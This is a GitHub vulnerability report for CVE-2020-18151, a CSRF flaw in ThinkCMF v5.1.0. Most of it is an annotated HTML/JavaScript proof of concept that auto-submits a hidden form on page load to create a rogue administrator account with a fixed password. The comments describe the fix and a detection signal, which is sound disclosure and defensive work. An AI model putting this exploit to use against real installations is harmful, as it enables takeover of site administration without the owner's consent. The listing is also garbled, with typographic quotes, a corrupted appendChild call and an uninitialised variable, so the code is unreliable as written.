CVE-2020-18151: I found a CSRF vulnerability that can add the administrator account · Issue #580 · thinkcmf/thinkcmf
Cross-Site Request Forgery (CSRF) vulnerability in ThinkCMF v5.1.0 that allows an attacker to add an administrator account.
While an administrator is logged in, opening a page containing the following code causes an administrator account to be added automatically.
(Replace "http://tp.im" in `url` with the domain name of your own installation.)
<html><body>
<script type="text/javascript">
/**
 * Builds a hidden form from the given markup and submits it immediately.
 *
 * This is the delivery half of the proof of concept: the form is submitted
 * as a top-level navigation, so the browser sends the request with whatever
 * cookies it holds for the target site. Because the request carries no
 * per-session anti-CSRF token, a server that does not validate one (and
 * whose session cookie is not marked SameSite) cannot tell it apart from a
 * form the administrator submitted deliberately.
 *
 * NOTE(review): the listing is reproduced as it appears on the issue page,
 * including typographic quotes and a garbled appendChild call; it is kept
 * verbatim here as evidence rather than as runnable code.
 *
 * @param {string} url    - the form action; the endpoint under test
 * @param {string} fields - HTML for the hidden <input> elements to post
 */
function post(url, fields)
{
var p = document.createElement(“form”);
p.action = url;
// The attacker-authored markup becomes the form body; nothing here is
// user-visible before submission.
p.innerHTML = fields;
p.target = “_self";
p.method = “post";
document.body.appendChild§;
p.submit();
}
/**
 * Assembles the hidden fields for the admin "add user" form and posts them.
 *
 * The field names (user_login, user_pass, user_email, role_id[]) mirror the
 * parameters the ThinkCMF admin user-creation form submits — inferred from
 * the endpoint path, not shown on this page. The request contains no CSRF
 * token, which is the defect being reported: the server-side fix is to
 * require and validate a per-session token on /admin/user/addpost (with
 * SameSite on the admin session cookie and an Origin/Referer check as
 * defence in depth). On the detection side, an admin-user creation whose
 * Referer is a foreign origin is the signal to look for.
 */
function csrf_hack()
{
// `fields` is declared but never initialised, so the first `+=` prepends
// the string "undefined" to the markup; left as on the original page.
var fields;
fields += " <input type="hidden” name="user_login” value="CSRFadministrator" />";
fields += " <input type="hidden" name="user_pass" value="admin1234" />";
fields += " <input type="hidden" name="user_email" value="[email protected]" />";
// role_id[] = 1 is presumably the administrator role — TODO confirm against
// the installation's role table.
fields += " <input type="hidden" name="role_id[]" value="1" />";
// Placeholder host from the issue; see the note above the listing.
var url = "http://tp.im/admin/user/addpost.html";
post(url, fields);
}
// Fires the request as soon as the page loads, with no user interaction;
// the victim only has to open the page while their admin session is live.
window.onload = function(){csrf_hack();}
</script>
</body></html>